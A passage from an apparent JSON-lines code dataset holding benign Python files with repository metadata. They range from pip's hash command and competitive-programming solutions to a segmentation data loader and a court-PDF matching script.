args):\n # type: (Values, List[str]) -> int\n if not args:\n self.parser.print_usage(sys.stderr)\n return ERROR\n\n algorithm = options.algorithm\n for path in args:\n write_output('%s:\\n--hash=%s:%s',\n path, algorithm, _hash_of_file(path, algorithm))\n return SUCCESS\n\n\ndef _hash_of_file(path, algorithm):\n # type: (str, str) -> str\n \"\"\"Return the hash digest of a file.\"\"\"\n with open(path, 'rb') as archive:\n hash = hashlib.new(algorithm)\n for chunk in read_chunks(archive):\n hash.update(chunk)\n return hash.hexdigest()\n","repo_name":"myawnhc/MSF","sub_path":"venv/lib/python3.8/site-packages/pip/_internal/commands/hash.py","file_name":"hash.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25619308798","text":"import sys\nsys.stdin = open('input.txt', 'r')\n\nT = int(input())\n# 여러개의 테스트 케이스가 주어지므로, 각각을 처리합니다.\nfor test_case in range(1, T + 1):\n m, n = map(int, input().split())\n \n input_array = []\n # input 받는 부분\n for i in range(m):\n lst = list(map(int, input().split()))\n input_array.append(lst)\n \n maximum = 0\n for i in range(m-n+1):\n for j in range(m-n+1):\n total = 0\n for a in range(i, i+n):\n for b in range(j, j+n):\n total += input_array[a][b]\n if total > maximum:\n maximum = total\n print(\"#%d %d\" % (test_case, maximum))\n","repo_name":"minnczi/Algorithm","sub_path":"Swea/swea_2001.py","file_name":"swea_2001.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12505911054","text":"def get_row(indexY, rows):\n return rows[indexY]\n\n\ndef check_lever(directions):\n return \"L\" in directions\n\n\ndef print_directions(directions):\n string = \"\"\n for direction in directions:\n if direction == \"N\":\n string += f\"({direction})orth\"\n\n elif direction == \"S\":\n string += f\"({direction})outh\"\n\n elif direction == \"E\":\n string += f\"({direction})ast\"\n\n elif direction == \"W\":\n string += f\"({direction})est\"\n if direction != \"L\":\n string += \" or \"\n\n # Til að taka út síðasta \"or\" og bæta við \".\"\n return string[:-4] + \".\"\n\n\ndef get_directions(indexX, row):\n return row[indexX]\n\ndef can_move_to_direction(indexX, row, direction):\n directions = get_directions(indexX, row)\n\n return direction in directions\n\n\ndef get_new_position_for_direction(direction, indexX, indexY):\n if direction == \"N\":\n return indexX, indexY + 1\n elif direction == \"S\":\n return indexX, indexY - 1\n elif direction == \"W\":\n return indexX - 1, indexY\n elif direction == \"E\":\n return indexX + 1, indexY\n\ndef play():\n coins = 0\n indexX = 0\n indexY = 0\n rows = [[\"ES\", \"EWL\", \"SW\"],\n [\"NESL\", \"SWL\",\"NSL\"],\n [\"N\", \"N\", \"V\"]]\n rows.reverse()\n\n valid = True\n while True:\n curr_row = get_row(indexY, rows)\n directions = get_directions(indexX, curr_row)\n if directions == \"V\":\n print(f\"Victory! 
Total coins {coins}.\")\n\n return input(\"Play again (y/n): \").lower() == \"y\"\n\n if check_lever(directions) and valid:\n choice = input(\"Pull a lever (y/n): \")\n\n if choice.lower() == \"y\":\n coins += 1\n print(f\"You received 1 coin, your total is now {coins}.\")\n\n\n print(\"You can travel:\", print_directions(directions))\n\n direction = input(\"Direction: \")\n direction = direction.upper()\n\n if can_move_to_direction(indexX, curr_row, direction):\n indexX, indexY = get_new_position_for_direction(direction, indexX, indexY)\n valid = True\n else:\n print(\"Not a valid direction!\")\n valid = False\n\ndef main():\n while play():\n pass\n\nmain()","repo_name":"Illugi317/forritun","sub_path":"Unsorted/Tile2.py","file_name":"Tile2.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23449764611","text":"with open(\"A-large.in\") as f:\n input_Arr = f.readlines()\nwith open(\"output.txt\",\"w\") as g:\n for q in range(int(input_Arr[0])):\n inp=input_Arr[q+1].split(' ')\n cur=0\n needed=0\n for c in range(len(inp[1])-1):\n cur+=int(inp[1][c])\n if (c+1)>cur:\n needed+=1\n cur+=1\n outp='Case #'+str(q+1)+': '+str(needed)+'\\n'\n g.write(outp)\n \n \n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/1674.py","file_name":"1674.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10640065312","text":"import os\nimport json\nimport geopandas as gpd\nfrom shapely.geometry import Point\n\n\ndef read_stations_osm_format(city_name, grid, engine_type):\n\n stations_path = os.path.join(\n os.path.dirname(os.path.dirname(__file__)),\n \"city_data_manager\",\n \"data\",\n city_name,\n \"raw\",\n \"geo\",\n \"openstreetmap\",\n \"station_locations.json\"\n )\n f = open(stations_path, \"r\")\n station_locations = json.load(f)\n f.close()\n charging_points = station_locations[city_name][engine_type]\n points_list = []\n\n for point in charging_points.keys():\n points_list.append(\n {\n \"geometry\": Point(\n charging_points[point][\"longitude\"], charging_points[point][\"latitude\"]\n ),\n \"n_poles\": charging_points[point][\"n_poles\"]\n }\n )\n stations_gdf = gpd.GeoDataFrame(points_list)\n n_poles_by_zone = {}\n tot_n_poles = 0\n for (p, n) in zip(stations_gdf.geometry, stations_gdf.n_poles):\n for (geom, zone) in zip(grid.geometry, grid.zone_id):\n if geom.intersects(p):\n if zone in n_poles_by_zone.keys():\n n_poles_by_zone[zone] += n\n else:\n n_poles_by_zone[zone] = n\n tot_n_poles += n\n return n_poles_by_zone, stations_gdf, tot_n_poles\n","repo_name":"SmartData-Polito/odysseus","sub_path":"odysseus/supply_modelling/service_stations/service_stations_utils.py","file_name":"service_stations_utils.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"6911397132","text":"import elephant\nimport neo\nfrom scipy import signal\nfrom quantities import ms, Hz, uV, s, V\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom neo.io.nixio import NixIO\nfrom neo.core import AnalogSignal, SpikeTrain, IrregularlySampledSignal\nimport h5py\nfrom itertools import groupby\nfrom ceed.analysis import CeedDataReader\nfrom ephys_analysis.ceed_scripts.ceed_stimulus import get_all_exps, write_exp_df_to_excel\nimport sys\nimport pandas as pd\n\n\ndef 
fix_h5_alignment_odor_series(h5_file, exp_df, drop_exps=None, wait_time=1*s, stage=\"Odor series\", fs=20000*Hz,\n substage_durations=[5, 25, 5, 25, 5, 25, 5],\n intensities=[34.6875, 0, 34.6875, 0, 69.375, 0, 69.375]):\n \"\"\"\n Aligns CEED data with MCS data from the merged h5 file when the merge script fails to align properly.\n\n EXAMPLE:\n h5_filename = base_filename.format(wave_clus=\"\", electrode=\"\", ext=\"h5\")\n\n \"\"\"\n\n period = (1/fs).rescale(s).item()\n wait_time = wait_time.rescale(s).item()\n\n f = h5py.File(h5_file, 'r')\n dig_io = f[\"data\"][\"mcs_data\"][\"data_arrays\"][\"digital_io\"][\"data\"].value\n\n stim = np.where(dig_io != 0)[0] # When (in samples) the projector is projecting some light pattern\n\n stim_delta_samples = np.diff(stim)\n non_contig = np.where(stim_delta_samples > 1) # When (in samples) the projected pattern changes, by index of stim/stim_delta\n\n stim = stim[non_contig].tolist()\n stim_times = [x * period for x in stim]\n stim_times = np.array(stim_times)\n stim_delta_times = np.diff(stim_times)\n\n deltas_over_wait = np.where(stim_delta_times > wait_time)\n stim = np.array(stim)\n times_over_wait = stim_times[deltas_over_wait]\n\n stage_df = exp_df[exp_df['stage']==stage]\n stage_exps = stage_df['experiment'].unique().tolist()\n\n stage_exps = [int(stage_exp) for stage_exp in stage_exps]\n stage_exps.sort()\n stage_exps = [str(stage_exp) for stage_exp in stage_exps]\n\n if len(stage_exps) != len(times_over_wait):\n times_over_wait = times_over_wait[(len(times_over_wait)-len(stage_exps)):]\n\n\n for i, exp in enumerate(stage_exps):\n i, exp = int(i), int(exp)\n no_times = exp_df.index[(exp_df['experiment'] == exp) & (pd.isna(exp_df['t_start']))].tolist()\n print(no_times)\n if len(no_times) == 0:\n continue\n else:\n t_start = times_over_wait[i] * s\n substage_counter = 0\n for no_time in no_times:\n exp_df.loc[no_time, 't_start'] = t_start\n exp_df.loc[no_time, 't_stop'] = t_start + substage_durations[substage_counter] * s\n exp_df.loc[no_time, 'intensity'] = intensities[substage_counter]\n t_start = t_start + substage_durations[substage_counter] * s\n substage_counter += 1\n return exp_df\n\n\ndef fix_h5_alignment_single_stimuli(h5_file, exp_df, drop_exps=None, wait_time=1*s, stage=\"Odor A, strong\", fs=20000*Hz,\n stimulus_duration=5*s, intensity=69.375):\n \"\"\"\n Aligns CEED data with MCS data from the merged h5 file when the merge script fails to align properly.\n\n EXAMPLE:\n h5_filename = base_filename.format(wave_clus=\"\", electrode=\"\", ext=\"h5\")\n\n \"\"\"\n if drop_exps is not None:\n for exp in drop_exps:\n exp_df = exp_df.drop(exp)\n\n period = (1/fs).rescale(s).item()\n wait_time = wait_time.rescale(s).item()\n\n f = h5py.File(h5_file, 'r')\n dig_io = f[\"data\"][\"mcs_data\"][\"data_arrays\"][\"digital_io\"][\"data\"].value\n\n stim = np.where(dig_io != 0)[0] # When (in samples) the projector is projecting some light pattern\n\n stim_delta_samples = np.diff(stim)\n non_contig = np.where(stim_delta_samples > 1) # When (in samples) the projected pattern changes, by index of stim/stim_delta\n\n stim = stim[non_contig].tolist()\n stim_times = [x * period for x in stim]\n stim_times = np.array(stim_times)\n stim_delta_times = np.diff(stim_times)\n\n deltas_over_wait = np.where(stim_delta_times > wait_time)\n times_over_wait = stim_times[deltas_over_wait]\n stage_df = exp_df[exp_df['stage']==stage]\n stage_exps = stage_df['experiment'].unique().tolist()\n\n if len(stage_exps) == 0:\n raise Exception(\"There are no 
experiments found with the given stage!\")\n if len(stage_exps) != len(times_over_wait):\n raise Exception(\"The given stage has been found \" + str(len(stage_exps)) + \" times in the metadata, but has \" +\n \"been detected \" + str(len(times_over_wait)) + \" times in the recording!\")\n\n for i, exp in enumerate(stage_exps):\n i, exp = int(i), int(exp)\n no_times = exp_df.index[(exp_df['experiment'] == exp) & (pd.isna(exp_df['t_start']))].tolist()\n\n if len(no_times) == 0:\n continue\n else:\n t_start = times_over_wait[i] * s\n for no_time in no_times:\n exp_df.loc[no_time, 't_start'] = t_start\n exp_df.loc[no_time, 't_stop'] = t_start + stimulus_duration\n exp_df.loc[no_time, 'intensity'] = intensity\n return exp_df\n\n\n\n","repo_name":"mgm248/sliceAnalysis","sub_path":"Jesse/file_management.py","file_name":"file_management.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74895638273","text":"\"\"\"\ncumulus\nUsage:\n cumulus start [...] [--latest]\n cumulus init (...) [--clean] [--project-name=]\n cumulus stop\n cumulus kill\n cumulus restart [...]\n cumulus logs [] [-f]\n cumulus shell [] [--shell=]\n cumulus -h | --help\n cumulus --version\nOptions:\n -h --help Show this screen.\n --version Show version.\nExamples:\n cumulus start\n cumulus start django\n cumulus init django, mysql\n cumulus stop\n cumulus kill\n cumulus restart --all --clean\n cumulus logs -f\n cumulus shell django --shell=zsh\nHelp:\n For bugs using this tool, please open an issue on the Github repository:\n https://github.com/fattouche/stratocumulus\n\"\"\"\n\nfrom inspect import getmembers, isclass\nfrom docopt import docopt\nimport os\nimport subprocess\nimport prerequisite\nfrom collections import defaultdict\n\nfrom helpers import *\n\nSTART_SHELL = \"./start_shell.sh\"\nDOCKER_HUB = \"strcum/\"\nDOCKER_COMPOSE = \"docker-compose\"\nENTRYPOINT = \"./docker_entrypoint.sh\"\nLOGFILE = \"docker-compose-log.out\"\nVERSION = '1.0.0'\nPORTS = {\"django\": \"41000\", \"rails\": \"41001\",\n \"redis\": \"6379\", \"mysql\": \"3306\", \"elasticsearch\": \"9200\", \"memcached\": \"11211\"}\nCOMMANDS = {\"django\": \"python manage.py runserver 0:{0}\".format(PORTS[\"django\"]),\n \"rails\": \"rails server -p {0} -b 0.0.0.0\".format(PORTS[\"rails\"]),\n \"mysql\": \"mysqld\"}\nDOCKER_COMPOSE_VERSION = '3.6'\n\n\ndef main():\n \"\"\"Main CLI entrypoint.\"\"\"\n import commands\n prerequisite.check_docker()\n options = docopt(__doc__, version=VERSION)\n for (k, v) in options.items():\n if hasattr(commands, k) and v:\n module = getattr(commands, k)\n commands = getmembers(module, isclass)\n command = [command[1]\n for command in commands if command[0] != 'Base'][0]\n command = command(options)\n command.run()\n return\n\n exit(__doc__)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Fattouche/Stratocumulus","sub_path":"src/cumulus/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27353196587","text":"from math import sqrt\n\n\ndef in_circles(x, y, r1, r2, x_center, y_center):\n \"\"\"Determines whether or not a pixel [x,y] is contained within two circles of radius r1 and r2,\n spanned from the center of an image with center pixel [x_center, y_center]\n :param x: x coordinate of the pixel\n :param y: y coordinate of the pixel\n :param r1: radius of the inner circle\n :param r2: 
radius of the outer circle\n :param x_center: x coordinate of the center of the image\n :param y_center: y coordinate of the center of the image\n :return: True if pixel is contained within the two circles\n \"\"\"\n x_dist = abs(x-x_center)\n y_dist = abs(y-y_center)\n r = sqrt(x_dist*x_dist + y_dist*y_dist)\n return r1 < r < r2\n","repo_name":"CasperKoning/circle-visuals","sub_path":"circle_utils.py","file_name":"circle_utils.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"13723719851","text":"import logging\nimport os\nfrom os import listdir\nfrom os.path import splitext\nfrom pathlib import Path\n\nimport cv2\nimport numpy as np\nfrom PIL import Image\nimport torch\nfrom torch.utils.data import Dataset, DataLoader, random_split\nimport torchvision.transforms as T\nimport torchvision.transforms.functional as TF\nimport copy\nimport pathlib\n\nfrom utils import *\n\nfrom unet.unet_model import *\nfrom transunet import MyTransUNet, MyTransUNet2\nimport re\n\n\nclass BasicDataset(Dataset):\n def __init__(self, images_dir: str, masks_dir: str, scale: float = 1.0, mask_suffix: str = '', resize=None,\n transform=None):\n \"\"\"\n resize: tuple, eg:(128,128)\n \"\"\"\n self.images_dir = Path(images_dir)\n self.masks_dir = Path(masks_dir)\n assert 0 < scale <= 1, 'Scale must be between 0 and 1'\n self.scale = scale\n self.mask_suffix = mask_suffix\n\n self.ids = [splitext(file)[0] for file in listdir(images_dir) if not file.startswith('.')]\n if not self.ids:\n raise RuntimeError(f'No input file found in {images_dir}, make sure you put your images there')\n logging.info(f'Creating dataset with {len(self.ids)} examples')\n\n self.resize = resize\n\n def __len__(self):\n return len(self.ids)\n\n @staticmethod\n def preprocess(tmp, scale, is_mask, resize=None):\n img = tmp.copy()\n img_format = img.format\n w, h = img.size\n if resize is None:\n newW, newH = int(scale * w), int(scale * h)\n assert newW > 0 and newH > 0, 'Scale is too small, resized images would have no pixel'\n img = img.resize((newW, newH))\n else:\n img = img.resize(resize)\n\n if is_mask:\n if img_format == 'PNG' or img_format == 'TIFF' or img_format == 'JPEG': # convert the bool array into a 0/1 array\n # img = img.convert('1')\n img_ndarray = np.asarray(img.convert('1')) * 1\n else:\n img_ndarray = np.asarray(img)\n else:\n img_ndarray = np.asarray(img)\n\n # only 2 dim\n if img_ndarray.ndim == 2 and not is_mask:\n img_ndarray = img_ndarray[np.newaxis, ...]\n elif not is_mask:\n img_ndarray = img_ndarray.transpose((2, 0, 1))\n if not is_mask:\n img_ndarray = img_ndarray / 255\n\n return img_ndarray\n\n @staticmethod\n def preprocess2(tmp, scale, is_mask, resize=None):\n img = copy.deepcopy(tmp)\n if is_mask:\n w, h = img.shape\n else:\n w, h, c = img.shape\n if resize is None:\n newW, newH = int(scale * w), int(scale * h)\n assert newW > 0 and newH > 0, 'Scale is too small, resized images would have no pixel'\n img = cv2.resize(img, (newW, newH), interpolation=cv2.INTER_CUBIC)\n else:\n img = cv2.resize(img, resize, interpolation=cv2.INTER_CUBIC)\n\n if is_mask: # make sure the mask values are 0 or 1\n img = np.where(img >= 1, 1, 0)\n # (_, img) = cv2.threshold(img, 125, 1, cv2.THRESH_BINARY)\n\n if not is_mask:\n # img = img / 255\n transform = T.Compose([\n T.ToTensor(),\n T.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225],\n ),\n ])\n img = transform(img)\n elif is_mask:\n transform = T.Compose([\n T.ToTensor(),\n ])\n img = 
transform(img)\n\n # only 2 dim\n if img.ndim == 2 and not is_mask:\n # img = img[np.newaxis, ...]\n img = torch.unsqueeze(img, 0)\n # elif not is_mask:\n # img = img.transpose((2, 0, 1))\n # img = img.transpose(0, 1)\n return img\n\n def transform(self, image, mask, resize=(300, 300)):\n\n # Transform to tensor\n img_transform = T.Compose([\n T.ToTensor(),\n T.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225],\n ),\n ])\n image = img_transform(image)\n\n mask_transform = T.Compose([\n T.ToTensor(),\n ])\n # (_, mask) = cv2.threshold(mask, 1, 1, cv2.THRESH_BINARY)\n mask = np.where(mask >= 1, 1, 0)\n mask = mask_transform(mask)\n\n # Resize\n resize = T.Resize(size=resize)\n image = resize(image)\n mask = resize(mask)\n\n ### Random crop\n # i, j, h, w = T.RandomCrop.get_params(\n # image, output_size=(512, 512))\n # image = TF.crop(image, i, j, h, w)\n # mask = TF.crop(mask, i, j, h, w)\n\n # Random horizontal flipping\n if random.random() > 0.5:\n image = TF.hflip(image)\n mask = TF.hflip(mask)\n\n # Random vertical flipping\n if random.random() > 0.5:\n image = TF.vflip(image)\n mask = TF.vflip(mask)\n\n # image = TF.to_tensor(image)\n # mask = TF.to_tensor(mask)\n return image, mask\n\n @staticmethod\n def load(filename, is_mask=False):\n ext = splitext(filename)[1]\n try:\n if ext in ['.npz', '.npy']:\n return Image.fromarray(np.load(filename))\n elif ext in ['.pt', '.pth']:\n return Image.fromarray(torch.load(filename).numpy())\n elif ext in ['.gif']:\n if not is_mask:\n return np.asarray(Image.open(filename))\n else:\n return np.asarray(Image.open(filename).convert('L'))\n else:\n if not is_mask:\n tmp = cv2.imread(str(filename), cv2.IMREAD_COLOR)\n tmp = cv2.cvtColor(tmp, cv2.COLOR_BGR2RGB)\n # tmp = tmp[:, :, [2, 1, 0]]\n return tmp\n else:\n return cv2.imread(str(filename), cv2.IMREAD_GRAYSCALE)\n except:\n logging.error(\"image {} loading encounter error\".format(splitext(filename)[0]))\n\n def __getitem__(self, idx):\n name = self.ids[idx]\n mask_file = list(self.masks_dir.glob(name + self.mask_suffix + '.*'))\n img_file = list(self.images_dir.glob(name + '.*'))\n # print(\"mask dir: {}\".format(self.masks_dir))\n # print(\"image dir: {}\".format(self.images_dir))\n assert len(img_file) == 1, f'Either no image or multiple images found for the ID {name}: {img_file}'\n assert len(mask_file) == 1, f'Either no mask or multiple masks found for the ID {name}: {mask_file}'\n pil_img = self.load(img_file[0])\n pil_mask = self.load(mask_file[0], is_mask=True)\n # pil_img = Image.open(img_file[0])\n # pil_mask = Image.open(mask_file[0]).convert('L')\n img = None\n mask = None\n try:\n # img = self.preprocess2(pil_img, self.scale, is_mask=False, resize=self.resize, )\n # mask = self.preprocess2(pil_mask, self.scale, is_mask=True, resize=self.resize, )\n img, mask = self.transform(pil_img, pil_mask)\n except:\n print(\"encounter error during preprocess : {}\".format(name))\n raise RuntimeError\n\n # rtn_image = torch.as_tensor(copy.deepcopy(img)).float().contiguous()\n # rtn_mask = torch.as_tensor(copy.deepcopy(mask)).long().contiguous()\n\n diff = np.setdiff1d(np.unique(mask), np.array([0, 1]))\n assert diff.size == 0, \"value not match, diff:{}\".format(diff)\n return {\n 'image': img,\n 'mask': mask\n }\n\n\nclass CarvanaDataset(BasicDataset):\n def __init__(self, images_dir, masks_dir, scale=1, resize=False):\n if not resize:\n super().__init__(images_dir, masks_dir, scale, mask_suffix='_mask')\n else:\n super().__init__(images_dir, masks_dir, scale, 
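# The commented-out RandomCrop block in BasicDataset.transform above hints at
# the standard recipe for paired crops: sample the crop parameters once, then
# apply the identical crop to image and mask with the functional API, exactly
# as the flips already do with a shared coin flip. A hedged sketch (assumes
# torchvision as imported in the record; 512x512 is illustrative only):
import torchvision.transforms as T
import torchvision.transforms.functional as TF

def paired_random_crop(image, mask, size=(512, 512)):
    # one draw of (top, left, height, width), reused for both tensors so the
    # mask stays pixel-aligned with the image
    i, j, h, w = T.RandomCrop.get_params(image, output_size=size)
    return TF.crop(image, i, j, h, w), TF.crop(mask, i, j, h, w)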
mask_suffix='_mask', resize=(256, 256))\n\n\nclass ForgeDataset(BasicDataset):\n def __init__(self, images_dir, masks_dir, scale=1, mask_suffix='', resize=(256, 256)):\n super().__init__(images_dir, masks_dir, scale, mask_suffix=mask_suffix, resize=resize)\n\n\nif __name__ == \"__main__\":\n print(\"___main___\")\n ################################### Test ForgeDataset ########################################################\n ROOT_PATH = str(pathlib.Path().resolve().parent)\n # CURRENT_PATH = os.path.dirname(os.path.abspath(__file__))\n ## test dataset valid\n DATASETS_DIR = Path(r'F:\\datasets')\n # DATASETS_DIR = Path('/media/ian/WD/datasets')\n dir_img = DATASETS_DIR.joinpath('COCO', 'coco2017_large_cm', 'A', 'train')\n dir_mask = DATASETS_DIR.joinpath('COCO', 'coco2017_large_cm', 'B', 'train')\n dir_checkpoint = Path(r'.\\checkpoints_big_coco_forge(UNet)')\n dataset = ForgeDataset(dir_img, dir_mask, 1, mask_suffix='', resize=(256, 256))\n loader_args = dict(batch_size=2, num_workers=4, pin_memory=True)\n dataloader = DataLoader(dataset, shuffle=True, **loader_args)\n dataiter = iter(dataloader)\n idx = 0\n while True:\n try:\n features, labels = next(dataiter)\n print('number: {}'.format(idx))\n idx += 1\n except StopIteration:\n break\n features, labels = dataiter.next()\n\n #################################################################################################################\n # random_index = int(np.random.random() * len(dataset))\n # single_example = dataset[random_index]\n # true_mask = single_example['mask']\n # img = single_example['image']\n # img = img.unsqueeze(dim=0)\n # model = 'Unet'\n # latest_model, latest_epoch = find_latest_epoch(\n # os.path.join(ROOT_PATH, 'result', 'logs', 'large_cm', model, ))\n # if model == 'Unet':\n # net = Unet(n_channels=3, n_classes=1)\n # elif model == 'Res_Unet':\n # net = Res_Unet(n_channels=3, n_classes=1)\n # elif model == 'Ringed_Res_Unet':\n # net = Ringed_Res_Unet(n_channels=3, n_classes=1)\n # elif model == 'TransUnet':\n # net = MyTransUNet(in_channels=3, classes=1)\n # net.load_state_dict(torch.load(latest_model))\n # with torch.no_grad():\n # pred_mask = net(img)\n # pred_mask = torch.sigmoid(pred_mask).squeeze().cpu()\n # true_mask = true_mask.squeeze()\n # print(img.size())\n # print(pred_mask.size())\n # print(true_mask.size())\n #################################################################################################################\n # masks = list(Path(dir_mask).glob(\"*.*\"))\n # print(len(masks))\n # print(os.system('who am i'))\n # output = os.popen('whoami')\n #################################################################################################################\n # f = open(\"/media/ian/WD/datasets/carvana-image-masking/train_masks/aa1\", \"r\")\n # print(f.read())\n #################################################################################################################\n # print(output.read())\n # dirname = os.path.dirname(__file__)\n # FILE_PATH3 = '/tmp/f1eb080c7182_15_mask.gif'\n # FILE_PATH = '/media/ian/WD/datasets/carvana-image-masking/train_masks/fff9b3a5373f_16_mask.gif'\n # FILE_PATH2 = '/media/ian/WD/datasets/carvana-image-masking/train/f1eb080c7182_15.gif'\n # print(os.path.exists(os.path.join(dirname, FILE_PATH)))\n # img = cv2.imread(FILE_PATH, cv2.IMREAD_COLOR)\n # img = Image.open(\"/tmp/f1eb080c7182_15_mask.gif\")\n # print(img)\n #################################################################################################################\n # test_img = 
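# A note on the __main__ loop above: BasicDataset.__getitem__ returns a dict,
# so `features, labels = next(dataiter)` unpacks the two *keys* ('image' and
# 'mask') as strings, not the tensors. Indexing the batch dict is the intended
# access pattern (a sketch, using the dataloader built above):
batch = next(iter(dataloader))
images, masks = batch['image'], batch['mask']  # batched image and mask tensors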
r'I:\\datasets\\big_coco_forge\\images\\000000.jpg'\n # pil_img = np.asarray(Image.open(test_img))\n # cv_img = cv2.imread(test_img)\n # # cv_img = cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB)\n # cv_img = cv_img[:, :, [2, 1, 0]]\n # unique, counts = np.unique((pil_img == cv_img), return_counts=True)\n # print(dict(zip(unique, counts)))\n","repo_name":"SYLin117/RRU-Net","sub_path":"utils/data_loading.py","file_name":"data_loading.py","file_ext":"py","file_size_in_byte":11967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14296980369","text":"\"\"\"\n250. Count Univalue Subtrees\nhttps://leetcode.com/problems/count-univalue-subtrees/\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def countUnivalSubtrees(self, root: TreeNode) -> int:\n self.count = 0\n self.dfs(root)\n return self.count\n\n # DFS - Postorder Traversal\n # If at least one child is \"True\" and root.val is equal to that child's value,\n # then root node is uniValue subtree node.\n # O(n) time complexity to traverse all roots\n # O(1) space complexity with recursion stack depth O(n)\n def dfs(self, root):\n if not root: return True\n l, r = self.dfs(root.left), self.dfs(root.right)\n l_match = (not root.left) or (root.left.val == root.val)\n r_match = (not root.right) or (root.right.val == root.val)\n if l and r and l_match and r_match:\n self.count += 1\n return True\n return False\n","repo_name":"mathvolcano/leetcode","sub_path":"0250_countUnivalSubtrees.py","file_name":"0250_countUnivalSubtrees.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28557251408","text":"import csv\nimport os \nimport glob\nimport pdb\nimport time\nimport tika\ntika.initVM()\nimport string\nimport re\nfrom tika import parser\nimport difflib\nfrom difflib import SequenceMatcher\ncsv_file = open('Bombay_high_court_input_2021_1.csv','r')\nreader = csv.reader(csv_file)\ndir_1 = '/home/imti/BombayHighcourtpdfs_1'\ndata_main_2 = []\nfor i in reader:\n Court = []\n Court.append(i[0])\n Journal_Reference = []\n Journal_Reference.append(i[1])\n Bench = []\n Bench.append(i[2])\n Applleant = []\n Applleant.append(i[3])\n Respondent = []\n Respondent.append(i[4])\n Judges = []\n Judges.append(i[5])\n Case_Number = []\n Case_Number.append(i[6])\n Decision_Date = []\n Decision_Date.append(i[7])\n data_excel_main = Court+Journal_Reference+Bench+Applleant+Respondent+Judges+Case_Number+Decision_Date\n data_main_2.append(data_excel_main)\ndata_main_2.pop(0)\nfor elem_list in data_main_2:\n data_lower_1 = [i.lower() for i in elem_list]\n data_strip = [i.strip() for i in data_lower_1]\n data_strip_1 = [\"\".join(string.split()) for string in data_strip]\n flag = False\n for path, subdirs, files in os.walk(dir_1):\n if flag == True:\n break\n for name in files:\n if flag == True:\n break\n file_data = parser.from_file(os.path.join(path, name))\n text = file_data['content']\n print(name)\n data1 = text.strip('\\n')\n data = text.splitlines()\n data_2 = [x.strip() for x in data if x]\n data_4 = [x for x in data_2 if len(x) != 1]\n data_5 = [x.replace('\\xa0','') for x in data_4 if x]\n data_6 = [x.replace('\\xad','') for x in data_5 if x]\n flag = True\n Judgement_data = []\n data_pdf = []\n for i in data_6:\n string_1 = \"\".join(i.lower().split())\n if 
flag:\n data_pdf.append(i)\n #if 'supremecourtofindia' in string_1:\n #flag = True\n if 'judgment' in string_1:\n flag = False\n break\n if 'judgement' in string_1:\n flag = False\n break\n if 'order' in string_1:\n flag = False\n break\n if 'corrigendum' in string_1:\n flag = False\n break\n list_1 = [ele.lower() for ele in data_pdf]\n list_2 = [\"\".join(string.split()) for string in list_1]\n list_3 = [elem.replace('appellant','').replace('applicant','').replace('respondent','').replace('respondents','').replace('petitioner','') for elem in list_2]\n data_2 = []\n for elem_app_res in data_strip_1[3:5]:\n print(elem_app_res)\n if flag == True:\n break\n for elem3 in list_3: \n seq=difflib.SequenceMatcher(None,elem_app_res,elem3)\n d=seq.ratio()\n percentage = (\"{0:.0f}\".format(d * 100))\n if int(percentage) >= 70:\n data_2.append(elem_app_res) \n mylist = list(dict.fromkeys(data_2))\n if len(mylist)>=2:\n csv_file = open('Bombay_high_court_2021_pdf_location.csv','a')\n writer = csv.writer(csv_file)\n data_file_name = []\n data_file_name.append(name)\n writer.writerow(elem_list+data_file_name)\n print(elem_list+data_file_name)\n flag = True\n break\n #mylist = list(dict.fromkeys(data_2))\n \n #flag = True\n #break\n #if len(mylist)>=2:\n #print(mylist)\n #flag = True\n #break\n'''for elem_app in data_strip_1[-2:-1]:\n for elem3 in list_2: \n array = elem_app\n seq=difflib.SequenceMatcher(None,array,elem3)\n d=seq.ratio()\n percentage = (\"{0:.0f}\".format(d * 100))\n if int(percentage) == 100:\n print(array,percentage)\n pdb.set_trace()'''\n'''data_1 = []\n data_1.append((array,percentage))\n if len(data_1) == 1:\n data_2 = []\n for elem_app_res in data_strip[3:5]:\n for elem3 in list_1: \n seq=difflib.SequenceMatcher(None,elem_app_res,elem3)\n d=seq.ratio()\n percentage = (\"{0:.0f}\".format(d * 100))\n if int(percentage) >= 40:\n data_2.append(elem_app_res) \n data_3 = data_1 + data_2\n if len(data_3)>=3:\n csv_file = open('Bombay_high_court_input_pdf_location_2021.csv','a')\n writer = csv.writer(csv_file) \n data_file_name = []\n data_file_name.append(name)\n writer.writerow(elem_list+data_file_name)'''\n \n\n\n\n'''data_2 = [] \n for elem_app in data_strip[3:]:\n if flag == True:\n break\n for elem3 in list_1:\n 